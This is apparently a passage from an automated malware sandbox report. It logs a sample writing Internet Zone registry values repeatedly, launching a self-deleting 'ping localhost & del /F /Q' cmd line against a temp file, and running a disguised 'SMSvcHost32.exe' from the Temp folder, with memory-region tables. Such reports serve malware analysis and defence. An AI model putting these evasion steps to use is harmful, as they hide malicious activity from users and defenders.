| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process #11: cmd.exe
50
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 & del /F /Q "C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp" > nul |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:27, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x30c |
| Parent PID | 0xe6c (c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D38
0x
D6C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00044fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00400000 | 0x004bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f40000 | 0x00f40000 | 0x00f43fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00f53fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0104ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x010b0000 | 0x01101fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001110000 | 0x01110000 | 0x0510ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05370000 | 0x056a6fff | Memory Mapped File | r |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efc0000 | 0x7efc0000 | 0x7f0bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f0c0000 | 0x7f0c0000 | 0x7f0e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc1562ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc15630000 | 0x7dfc15630000 | 0x7ffc1562ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0xd38
50
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x10b0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x765e2510 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 112, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\Nd9E1FYi\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x765bffc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765bb0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x775db440 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\PING.EXE, os_pid = 0xdb0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 |
Process #12: smsvchost32.exe
2055
287
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
| Command Line | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:02:24, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdd4 |
| Parent PID | 0x934 (c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
574
0x
C18
0x
C24
0x
918
0x
DF8
0x
93C
0x
C38
0x
494
0x
C08
0x
EAC
0x
EFC
0x
EE8
0x
F80
0x
AF4
0x
8AC
0x
B5C
0x
638
0x
F74
0x
E04
0x
628
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| smsvchost32.exe | 0x00400000 | 0x0043efff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x00440fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00451fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00461fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00471fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x00493fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004a0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004b0fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x004c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| counters.dat | 0x004d0000 | 0x004d0fff | Memory Mapped File | rw |
|
|
|
|
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x005f0000 | 0x006adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007e2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00870fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00a17fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x00ba0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000bb0000 | 0x00bb0000 | 0x01faffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x020affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x020effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020f0000 | 0x020f0000 | 0x0212ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x02130fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002140000 | 0x02140000 | 0x0214ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02150000 | 0x02486fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x0258ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x0268ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002690000 | 0x02690000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x02991fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x02a8bfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x02c03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02aa1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02d11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02c2efff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ad0000 | 0x02ad0000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02fd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c10000 | 0x02c10000 | 0x02d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02dabfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d10000 | 0x02d10000 | 0x02d11fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d20000 | 0x02d20000 | 0x03018fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d20000 | 0x02d20000 | 0x02d20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002d30000 | 0x02d30000 | 0x0312afff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02fa9fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fb0000 | 0x02fb0000 | 0x03231fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x033f0fff | Private Memory | rw |
|
|
|
- |
| wkscli.dll | 0x03130000 | 0x0313ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000003240000 | 0x03240000 | 0x0353dfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003400000 | 0x03400000 | 0x03993fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003540000 | 0x03540000 | 0x038adfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039a0000 | 0x039a0000 | 0x03f37fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f40000 | 0x03f40000 | 0x044d4fff | Private Memory | rwx |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6f830000 | 0x6fa3efff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x6fa40000 | 0x6fa55fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6fa60000 | 0x6faf1fff | Memory Mapped File | rwx |
|
|
|
- |
| adsldpc.dll | 0x6fb00000 | 0x6fb37fff | Memory Mapped File | rwx |
|
|
|
- |
| odbc32.dll | 0x6fb40000 | 0x6fbd8fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x6fbe0000 | 0x6fbe7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsuiext.dll | 0x6fbf0000 | 0x6fc98fff | Memory Mapped File | rwx |
|
|
|
- |
| activeds.dll | 0x6fca0000 | 0x6fcdafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x6fce0000 | 0x6fcfbfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x6fd00000 | 0x6fd17fff | Memory Mapped File | rwx |
|
|
|
- |
| odbctrac.dll | 0x6fd20000 | 0x6fd45fff | Memory Mapped File | rwx |
|
|
|
- |
| dsprop.dll | 0x6fd50000 | 0x6fd76fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000006fea0000 | 0x6fea0000 | 0x6feaffff | Private Memory | rwx |
|
|
|
- |
| winmmbase.dll | 0x6feb0000 | 0x6fed2fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x6fee0000 | 0x6ff03fff | Memory Mapped File | rwx |
|
|
|
- |
| browcli.dll | 0x6ff10000 | 0x6ff1efff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x6ff20000 | 0x6ff32fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x6ff40000 | 0x6ff5bfff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
